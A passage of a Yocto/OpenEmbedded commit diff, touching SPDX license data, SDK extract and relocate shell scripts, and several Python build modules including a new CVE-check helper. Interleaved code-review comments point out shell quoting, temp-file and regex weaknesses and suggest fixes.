+ "name": "Do What The F*ck You Want To Public License",
+ "licenseId": "WTFPL",
+ "seeAlso": [
+ "http://www.wtfpl.net/about/",
+ "http://sam.zoy.org/wtfpl/COPYING"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-2.0.json",
+ "referenceNumber": 458,
+ "name": "Open Government Licence v2.0",
+ "licenseId": "OGL-UK-2.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/2/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Attribution.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Attribution.json",
+ "referenceNumber": 459,
+ "name": "BSD with attribution",
+ "licenseId": "BSD-3-Clause-Attribution",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD_with_Attribution"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RPSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPSL-1.0.json",
+ "referenceNumber": 460,
+ "name": "RealNetworks Public Source License v1.0",
+ "licenseId": "RPSL-1.0",
+ "seeAlso": [
+ "https://helixcommunity.org/content/rpsl",
+ "https://opensource.org/licenses/RPSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.json",
+ "referenceNumber": 461,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Germany",
+ "licenseId": "CC-BY-NC-ND-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.1.json",
+ "referenceNumber": 462,
+ "name": "European Union Public License 1.1",
+ "licenseId": "EUPL-1.1",
+ "seeAlso": [
+ "https://joinup.ec.europa.eu/software/page/eupl/licence-eupl",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl1.1.-licence-en_0.pdf",
+ "https://opensource.org/licenses/EUPL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sendmail-8.23.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sendmail-8.23.json",
+ "referenceNumber": 463,
+ "name": "Sendmail License 8.23",
+ "licenseId": "Sendmail-8.23",
+ "seeAlso": [
+ "https://www.proofpoint.com/sites/default/files/sendmail-license.pdf",
+ "https://web.archive.org/web/20181003101040/https://www.proofpoint.com/sites/default/files/sendmail-license.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ODC-By-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ODC-By-1.0.json",
+ "referenceNumber": 464,
+ "name": "Open Data Commons Attribution License v1.0",
+ "licenseId": "ODC-By-1.0",
+ "seeAlso": [
+ "https://opendatacommons.org/licenses/by/1.0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/D-FSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/D-FSL-1.0.json",
+ "referenceNumber": 465,
+ "name": "Deutsche Freie Software Lizenz",
+ "licenseId": "D-FSL-1.0",
+ "seeAlso": [
+ "http://www.dipp.nrw.de/d-fsl/lizenzen/",
+ "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/de/D-FSL-1_0_de.txt",
+ "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/en/D-FSL-1_0_en.txt",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/deutsche-freie-software-lizenz",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/german-free-software-license",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_de.txt/at_download/file",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_en.txt/at_download/file"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause.json",
+ "referenceNumber": 466,
+ "name": "BSD 4-Clause \"Original\" or \"Old\" License",
+ "licenseId": "BSD-4-Clause",
+ "seeAlso": [
+ "http://directory.fsf.org/wiki/License:BSD_4Clause"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1.json",
+ "referenceNumber": 467,
+ "name": "GNU Lesser General Public License v2.1 only",
+ "licenseId": "LGPL-2.1",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-Views.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Views.json",
+ "referenceNumber": 468,
+ "name": "BSD 2-Clause with views sentence",
+ "licenseId": "BSD-2-Clause-Views",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/freebsd-license.html",
+ "https://people.freebsd.org/~ivoras/wine/patch-wine-nvidia.sh",
+ "https://github.com/protegeproject/protege/blob/master/license.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0-Perl.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-Perl.json",
+ "referenceNumber": 469,
+ "name": "Artistic License 1.0 (Perl)",
+ "licenseId": "Artistic-1.0-Perl",
+ "seeAlso": [
+ "http://dev.perl.org/licenses/artistic.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPOSL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPOSL-3.0.json",
+ "referenceNumber": 470,
+ "name": "Non-Profit Open Software License 3.0",
+ "licenseId": "NPOSL-3.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/NOSL3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/gSOAP-1.3b.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/gSOAP-1.3b.json",
+ "referenceNumber": 471,
+ "name": "gSOAP Public License v1.3b",
+ "licenseId": "gSOAP-1.3b",
+ "seeAlso": [
+ "http://www.cs.fsu.edu/~engelen/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Interbase-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Interbase-1.0.json",
+ "referenceNumber": 472,
+ "name": "Interbase Public License v1.0",
+ "licenseId": "Interbase-1.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20060319014854/http://info.borland.com/devsupport/interbase/opensource/IPL.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/StandardML-NJ.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/StandardML-NJ.json",
+ "referenceNumber": 473,
+ "name": "Standard ML of New Jersey License",
+ "licenseId": "StandardML-NJ",
+ "seeAlso": [
+ "http://www.smlnj.org//license.html"
+ ],
+ "isOsiApproved": false
+ }
+ ],
+ "releaseDate": "2021-08-08"
+} \ No newline at end of file
diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh
index bea6d4189a..4386b985bb 100644
--- a/meta/files/toolchain-shar-extract.sh
+++ b/meta/files/toolchain-shar-extract.sh
@@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then
exit 1
fi
-DEFAULT_INSTALL_DIR="@SDKPATH@"
+SDK_BUILD_PATH="@SDKPATH@"
+DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@"
SUDO_EXEC=""
EXTRA_TAR_OPTIONS=""
target_sdk_dir=""
@@ -95,7 +96,7 @@ while getopts ":yd:npDRSl" OPT; do
listcontents=1
;;
*)
- echo "Usage: $(basename $0) [-y] [-d <dir>]"
+ echo "Usage: $(basename "$0") [-y] [-d <dir>]"
echo " -y Automatic yes to all prompts"
echo " -d <dir> Install the SDK to <dir>"
echo "======== Extensible SDK only options ============"
@@ -111,17 +112,17 @@ while getopts ":yd:npDRSl" OPT; do
esac
done
-payload_offset=$(($(grep -na -m1 "^MARKER:$" $0|cut -d':' -f1) + 1))
+payload_offset=$(($(grep -na -m1 "^MARKER:$" "$0"|cut -d':' -f1) + 1))
if [ "$listcontents" = "1" ] ; then
if [ @SDK_ARCHIVE_TYPE@ = "zip" ]; then
- tail -n +$payload_offset $0 > sdk.zip
+ tail -n +$payload_offset "$0" > sdk.zip
if unzip -l sdk.zip;then
rm sdk.zip
else
rm sdk.zip && exit 1
fi
else
- tail -n +$payload_offset $0| tar tvJ || exit 1
+ tail -n +$payload_offset "$0"| tar tvJ || exit 1
fi
exit
fi
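Review bot: The zip branch writes the payload to a fixed name in the caller's current directory (`tail -n +$payload_offset "$0" > sdk.zip`), which overwrites any existing file of that name and follows a symlink already present there. A private temporary file avoids both, e.g. `tmpzip=$(mktemp) || exit 1`, then `tail -n +$payload_offset "$0" > "$tmpzip"` and `rm -f "$tmpzip"` on both branches. The extraction hunk at `@@ -242,14 +243,14 @@` uses the same fixed `sdk.zip` and may run `unzip` under `$SUDO_EXEC`, so it needs the same change.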
@@ -242,14 +243,14 @@ fi
printf "Extracting SDK..."
if [ @SDK_ARCHIVE_TYPE@ = "zip" ]; then
- tail -n +$payload_offset $0 > sdk.zip
+ tail -n +$payload_offset "$0" > sdk.zip
if $SUDO_EXEC unzip $EXTRA_TAR_OPTIONS sdk.zip -d $target_sdk_dir;then
rm sdk.zip
else
rm sdk.zip && exit 1
fi
else
- tail -n +$payload_offset $0| $SUDO_EXEC tar mxJ -C $target_sdk_dir --checkpoint=.2500 $EXTRA_TAR_OPTIONS || exit 1
+ tail -n +$payload_offset "$0"| $SUDO_EXEC tar mxJ -C $target_sdk_dir --checkpoint=.2500 $EXTRA_TAR_OPTIONS || exit 1
fi
echo "done"
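Review bot: `$target_sdk_dir` is still unquoted in `unzip ... -d $target_sdk_dir` and `tar mxJ -C $target_sdk_dir`, both of which may run under `$SUDO_EXEC`, while this change quotes only `$0`. A directory containing whitespace or glob characters would be word-split into extra arguments. Writing `-d "$target_sdk_dir"` and `-C "$target_sdk_dir"` closes that, unless the script already rejects such paths earlier, which is not visible in this hunk. `$EXTRA_TAR_OPTIONS` presumably has to stay unquoted because it can hold several options.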
diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh
index e3c10018ef..cee9adbf39 100644
--- a/meta/files/toolchain-shar-relocate.sh
+++ b/meta/files/toolchain-shar-relocate.sh
@@ -5,7 +5,7 @@ fi
# fix dynamic loader paths in all ELF SDK binaries
native_sysroot=$($SUDO_EXEC cat $env_setup_script |grep 'OECORE_NATIVE_SYSROOT='|cut -d'=' -f2|tr -d '"')
-dl_path=$($SUDO_EXEC find $native_sysroot/lib -name "ld-linux*")
+dl_path=$($SUDO_EXEC find $native_sysroot/lib -maxdepth 1 -name "ld-linux*")
if [ "$dl_path" = "" ] ; then
echo "SDK could not be set up. Relocate script unable to find ld-linux.so. Abort!"
exit 1
@@ -55,10 +55,13 @@ fi
for replace in "$target_sdk_dir -maxdepth 1" "$native_sysroot"; do
$SUDO_EXEC find $replace -type f
done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \
- awk -F':' '{printf "\"%s\"\n", $1}' | \
- grep -Ev "$target_sdk_dir/(environment-setup-*|relocate_sdk*|${0##*/})" | \
+ awk -F': ' '{printf "\"%s\"\n", $1}' | \
+ grep -Fv -e "$target_sdk_dir/environment-setup-" \
+ -e "$target_sdk_dir/relocate_sdk" \
+ -e "$target_sdk_dir/post-relocate-setup" \
+ -e "$target_sdk_dir/${0##*/}" | \
xargs -n100 $SUDO_EXEC sed -i \
- -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \
+ -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \
-e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \
-e "s: /usr/bin/perl: /usr/bin/env perl:g"
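Review bot: The sed program `s:$SDK_BUILD_PATH:$target_sdk_dir:g` interpolates both paths unescaped, so a `:`, `&` or backslash in the install directory changes the substitution, and regex metacharacters in the build path (such as `.`) match more than the literal path. These edits may run under `$SUDO_EXEC` across every text file found in the SDK, so the replacement should be escaped first, e.g. `esc_target=$(printf '%s' "$target_sdk_dir" | sed 's/[&:\\]/\\&/g')` and then `-e "s:$SDK_BUILD_PATH:$esc_target:g"`. Alternatively the install directory could be restricted to a safe character set before this point. The symlink loop in the following hunk (`@@ -69,7 +72,7 @@`) builds the same expression and also passes `$l` and the `readlink` output unquoted to `ln -sfn`; that loop continues outside its hunk.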
@@ -69,7 +72,7 @@ fi
# change all symlinks pointing to @SDKPATH@
for l in $($SUDO_EXEC find $native_sysroot -type l); do
- $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:") $l
+ $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$SDK_BUILD_PATH:$target_sdk_dir:") $l
if [ $? -ne 0 ]; then
echo "Failed to setup symlinks. Relocate script failed. Abort!"
exit 1
diff --git a/meta/lib/bblayers/create.py b/meta/lib/bblayers/create.py
index 542f31fc81..f49b48d1b4 100644
--- a/meta/lib/bblayers/create.py
+++ b/meta/lib/bblayers/create.py
@@ -71,7 +71,7 @@ class CreatePlugin(LayerPlugin):
def register_commands(self, sp):
parser_create_layer = self.add_command(sp, 'create-layer', self.do_create_layer, parserecipes=False)
parser_create_layer.add_argument('layerdir', help='Layer directory to create')
- parser_create_layer.add_argument('--priority', '-p', default=6, help='Layer directory to create')
+ parser_create_layer.add_argument('--priority', '-p', default=6, help='Priority of recipes in layer')
parser_create_layer.add_argument('--example-recipe-name', '-e', dest='examplerecipe', default='example', help='Filename of the example recipe')
parser_create_layer.add_argument('--example-recipe-version', '-v', dest='version', default='0.1', help='Version number for the example recipe')
diff --git a/meta/lib/buildstats.py b/meta/lib/buildstats.py
index 8627ed3c31..c52b6c3b72 100644
--- a/meta/lib/buildstats.py
+++ b/meta/lib/buildstats.py
@@ -43,8 +43,8 @@ class SystemStats:
# depends on the heartbeat event, which fires less often.
self.min_seconds = 1
- self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
- self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
+ self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
+ self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
self.diskstats_ltime = None
self.diskstats_data = None
self.stat_ltimes = None
diff --git a/meta/lib/oe/copy_buildsystem.py b/meta/lib/oe/copy_buildsystem.py
index 31a84f5b06..d97bf9d1b9 100644
--- a/meta/lib/oe/copy_buildsystem.py
+++ b/meta/lib/oe/copy_buildsystem.py
@@ -20,7 +20,7 @@ def _smart_copy(src, dest):
mode = os.stat(src).st_mode
if stat.S_ISDIR(mode):
bb.utils.mkdirhier(dest)
- cmd = "tar --exclude='.git' --xattrs --xattrs-include='*' -chf - -C %s -p . \
+ cmd = "tar --exclude='.git' --exclude='__pycache__' --xattrs --xattrs-include='*' -chf - -C %s -p . \
| tar --xattrs --xattrs-include='*' -xf - -C %s" % (src, dest)
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
else:
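Review bot: `src` and `dest` are formatted unquoted into a command string that is run with `shell=True`, so a path containing spaces or shell metacharacters is split or interpreted by the shell instead of being passed to tar as one argument. Quoting them with `% (shlex.quote(src), shlex.quote(dest))` keeps the pipeline while making the arguments literal; it needs `import shlex`, and the file's import block is not shown here. The command strings built in the later hunks for `gen-lockedsig-cache` and `oe-check-sstate` use the same `%s` formatting. How those are executed is only partly visible, so they deserve the same check. `_smart_copy` starts above this hunk.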
@@ -259,7 +259,7 @@ def create_locked_sstate_cache(lockedsigs, input_sstate_cache, output_sstate_cac
bb.note('Generating sstate-cache...')
nativelsbstring = d.getVar('NATIVELSBSTRING')
- bb.process.run("gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
+ bb.process.run("PYTHONDONTWRITEBYTECODE=1 gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
if fixedlsbstring and nativelsbstring != fixedlsbstring:
nativedir = output_sstate_cache + '/' + nativelsbstring
if os.path.isdir(nativedir):
@@ -286,7 +286,7 @@ def check_sstate_task_list(d, targets, filteroutfile, cmdprefix='', cwd=None, lo
logparam = '-l %s' % logfile
else:
logparam = ''
- cmd = "%sBB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
+ cmd = "%sPYTHONDONTWRITEBYTECODE=1 BB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
env = dict(d.getVar('BB_ORIGENV', False))
env.pop('BUILDDIR', '')
env.pop('BBPATH', '')
diff --git a/meta/lib/oe/cve_check.py b/meta/lib/oe/cve_check.py
new file mode 100644
index 0000000000..ed4af18ced
--- /dev/null
+++ b/meta/lib/oe/cve_check.py
@@ -0,0 +1,212 @@
+import collections
+import re
+import itertools
+import functools
+
+_Version = collections.namedtuple(
+ "_Version", ["release", "patch_l", "pre_l", "pre_v"]
+)
+
+@functools.total_ordering
+class Version():
+
+ def __init__(self, version, suffix=None):
+
+ suffixes = ["alphabetical", "patch"]
+
+ if str(suffix) == "alphabetical":
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(?P<patch_l>[a-z]))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ elif str(suffix) == "patch":
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(p|patch)(?P<patch_l>[0-9]+))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ else:
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ regex = re.compile(r"^\s*" + version_pattern + r"\s*$", re.VERBOSE | re.IGNORECASE)
+
+ match = regex.search(version)
+ if not match:
+ raise Exception("Invalid version: '{0}'".format(version))
+
+ self._version = _Version(
+ release=tuple(int(i) for i in match.group("release").replace("-",".").split(".")),
+ patch_l=match.group("patch_l") if str(suffix) in suffixes and match.group("patch_l") else "",
+ pre_l=match.group("pre_l"),
+ pre_v=match.group("pre_v")
+ )
+
+ self._key = _cmpkey(
+ self._version.release,
+ self._version.patch_l,
+ self._version.pre_l,
+ self._version.pre_v
+ )
+
+ def __eq__(self, other):
+ if not isinstance(other, Version):
+ return NotImplemented
+ return self._key == other._key
+
+ def __gt__(self, other):
+ if not isinstance(other, Version):
+ return NotImplemented
+ return self._key > other._key
+
+def _cmpkey(release, patch_l, pre_l, pre_v):
+ # remove leading 0
+ _release = tuple(
+ reversed(list(itertools.dropwhile(lambda x: x == 0, reversed(release))))
+ )
+
+ _patch = patch_l.upper()
+
+ if pre_l is None and pre_v is None:
+ _pre = float('inf')
+ else:
+ _pre = float(pre_v) if pre_v else float('-inf')
+ return _release, _patch, _pre
+
+def cve_check_merge_jsons(output, data):
+ """
+ Merge the data in the "package" property to the main data file
+ output
+ """
+ if output["version"] != data["version"]:
+ bb.error("Version mismatch when merging JSON outputs")
+ return
+
+ for product in output["package"]:
+ if product["name"] == data["package"][0]["name"]:
+ bb.error("Error adding the same package %s twice" % product["name"])
+ return
+
+ output["package"].append(data["package"][0])
+
+def update_symlinks(target_path, link_path):
+ """
+ Update a symbolic link link_path to point to target_path.
+ Remove the link and recreate it if exist and is different.
+ """
+ if link_path != target_path and os.path.exists(target_path):
+ if os.path.exists(os.path.realpath(link_path)):
+ os.remove(link_path)
+ os.symlink(os.path.basename(target_path), link_path)
+
+def get_patched_cves(d):
+ """
+ Get patches that solve CVEs using the "CVE: " tag.
+ """
+
+ import re
+ import oe.patch
+
+ pn = d.getVar("PN")
+ cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
+
+ # Matches the last "CVE-YYYY-ID" in the file name, also if written
+ # in lowercase. Possible to have multiple CVE IDs in a single
+ # file name, but only the last one will be detected from the file name.
+ # However, patch files contents addressing multiple CVE IDs are supported
+ # (cve_match regular expression)
+
+ cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
+
+ patched_cves = set()
+ bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
+ for url in oe.patch.src_patches(d):
+ patch_file = bb.fetch.decodeurl(url)[2]
+
+ # Check patch file name for CVE ID
+ fname_match = cve_file_name_match.search(patch_file)
+ if fname_match:
+ cve = fname_match.group(1).upper()
+ patched_cves.add(cve)
+ bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
+
+ # Remote patches won't be present and compressed patches won't be
+ # unpacked, so say we're not scanning them
+ if not os.path.isfile(patch_file):
+ bb.note("%s is remote or compressed, not scanning content" % patch_file)
+ continue
+
+ with open(patch_file, "r", encoding="utf-8") as f:
+ try:
+ patch_text = f.read()
+ except UnicodeDecodeError:
+ bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
+ " trying with iso8859-1" % patch_file)
+ f.close()
+ with open(patch_file, "r", encoding="iso8859-1") as f:
+ patch_text = f.read()
+
+ # Search for one or more "CVE: " lines
+ text_match = False
+ for match in cve_match.finditer(patch_text):
+ # Get only the CVEs without the "CVE: " tag
+ cves = patch_text[match.start()+5:match.end()]
+ for cve in cves.split():
+ bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
+ patched_cves.add(cve)
+ text_match = True
+
+ if not fname_match and not text_match:
+ bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+
+ return patched_cves
+
+
+def get_cpe_ids(cve_product, version):
+ """
+ Get list of CPE identifiers for the given product and version
+ """
+
+ version = version.split("+git")[0]
+
+ cpe_ids = []
+ for product in cve_product.split():
+ # CVE_PRODUCT in recipes may include vendor information for CPE identifiers. If not,
+ # use wildcard for vendor.
+ if ":" in product:
+ vendor, product = product.split(":", 1)
+ else:
+ vendor = "*"
+
+ cpe_id = 'cpe:2.3:a:{}:{}:{}:*:*:*:*:*:*:*'.format(vendor, product, version)
+ cpe_ids.append(cpe_id)
+
+ return cpe_ids
+
+def convert_cve_version(version):
+ """
+ This function converts from CVE format to Yocto version format.
+ eg 8.3_p1 -> 8.3p1, 6.2_rc1 -> 6.2-rc1
+
+ Unless it is redefined using CVE_VERSION in the recipe,
+ cve_check uses the version in the name of the recipe (${PV})
+ to check vulnerabilities against a CVE in the database downloaded from NVD.
+
+ When the version has an update, i.e.
+ "p1" in OpenSSH 8.3p1,
+ "-rc1" in linux kernel 6.2-rc1,
+ the database stores the version as version_update (8.3_p1, 6.2_rc1).
+ Therefore, we must transform this version before comparing to the
+ recipe version.
+
+ In this case, the parameter of the function is 8.3_p1.
+ If the version uses the Release Candidate format, "rc",
+ this function replaces the '_' by '-'.
+ If the version uses the Update format, "p",
+ this function removes the '_' completely.
+ """
+ import re
+
+ matches = re.match('^([0-9.]+)_((p|rc)[0-9]+)$', version)
+
+ if not matches:
+ return version
+
+ version = matches.group(1)
+ update = matches.group(2)
+
+ if matches.group(3) == "rc":
+ return version + '-' + update
+
+ return version + update
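Review bot: In get_patched_cves, `cve_match` is unanchored, so the text `CVE: CVE-…` anywhere in a patch body (for example inside a changed documentation line) adds that ID to `patched_cves`. If the tag is always written at the start of a header line, anchoring narrows the match: `cve_match = re.compile(r"^CVE:( CVE-\d{4}-\d+)+", re.MULTILINE)`. The raw-string form also removes the invalid `\-` and `\d` escapes in this pattern and in `cve_file_name_match`, matching what this commit does for the buildstats.py regexes. Separately, update_symlinks tests `os.path.exists(os.path.realpath(link_path))`, which is false for a dangling link, so `os.symlink` would then fail on the existing name; `os.path.lexists(link_path)` covers that case. The module also uses `os` without importing it, so unless the runtime injects that name, `import os` belongs with the other imports.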
diff --git a/meta/lib/oe/gpg_sign.py b/meta/lib/oe/gpg_sign.py
index 7634d7ef1d..492f096eaa 100644
--- a/meta/lib/oe/gpg_sign.py
+++ b/meta/lib/oe/gpg_sign.py
@@ -111,7 +111,7 @@ class LocalSigner(object):
def verify(self, sig_file):
"""Verify signature"""
- cmd = self.gpg_cmd + [" --verify", "--no-permission-warning"]
+ cmd = self.gpg_cmd + ["--verify", "--no-permission-warning"]
if self.gpg_path:
cmd += ["--homedir", self.gpg_path]
diff --git a/meta/lib/oe/license.py b/meta/lib/oe/license.py
index c1274a61de..c4efbe142b 100644
--- a/meta/lib/oe/license.py
+++ b/meta/lib/oe/license.py
@@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor):
def visit_Str(self, node):
self.licenses.append(node.s)
+ def visit_Constant(self, node):
+ self.licenses.append(node.value)
+
def visit_BinOp(self, node):
if isinstance(node.op, ast.BitOr):
left = FlattenVisitor(self.choose_licenses)
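Review bot: `visit_Constant` here in FlattenVisitor, and again in ListVisitor in the next hunk, stores `node.value` without checking its type, whereas the `visit_Str` it parallels only ever received strings. If the parsed expression can ever contain a non-string constant (not determinable from this hunk), an int or None would end up in `licenses`; a guard such as `if isinstance(node.value, str):` keeps the two visitors equivalent. A short comment would also explain why both methods exist, e.g. `# visit_Str is kept for older Python; newer ast emits Constant nodes`. Both classes continue outside the hunks.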
@@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor):
def visit_Str(self, node):
self.licenses.add(node.s)
+ def visit_Constant(self, node):
+ self.licenses.add(node.value)
+
def list_licenses(licensestr):
"""Simply get a list of all licenses mentioned in a license string.
Binary operators are not applied or taken into account in any way"""
diff --git a/meta/lib/oe/package_manager.py b/meta/lib/oe/package_manager.py
index b0660411ea..502dfbe3ed 100644
--- a/meta/lib/oe/package_manager.py
+++ b/meta/lib/oe/package_manager.py
@@ -403,7 +403,7 @@ class PackageManager(object, metaclass=ABCMeta):
bb.utils.remove(self.intercepts_dir, True)
bb.utils.mkdirhier(self.intercepts_dir)
for intercept in postinst_intercepts:
- bb.utils.copyfile(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
+ shutil.copy(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
@abstractmethod
def _handle_intercept_failure(self, failed_script):
@@ -611,12 +611,13 @@ class PackageManager(object, metaclass=ABCMeta):
"'%s' returned %d:\n%s" %
(' '.join(cmd), e.returncode, e.output.decode("utf-8")))
- target_arch = self.d.getVar('TARGET_ARCH')
- localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
- if os.path.exists(localedir) and os.listdir(localedir):
- generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
- # And now delete the binary locales
- self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
+ if self.d.getVar('IMAGE_LOCALES_ARCHIVE') == '1':
+ target_arch = self.d.getVar('TARGET_ARCH')
+ localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
+ if os.path.exists(localedir) and os.listdir(localedir):
+ generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
+ # And now delete the binary locales
+ self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
def deploy_dir_lock(self):
if self.deploy_dir is None:
diff --git a/meta/lib/oe/packagedata.py b/meta/lib/oe/packagedata.py
index a82085a792..feb834c0e3 100644
--- a/meta/lib/oe/packagedata.py
+++ b/meta/lib/oe/packagedata.py
@@ -57,6 +57,17 @@ def read_subpkgdata_dict(pkg, d):
ret[newvar] = subd[var]
return ret
+def read_subpkgdata_extended(pkg, d):
+ import json
+ import gzip
+
+ fn = d.expand("${PKGDATA_DIR}/extended/%s.json.gz" % pkg)
+ try:
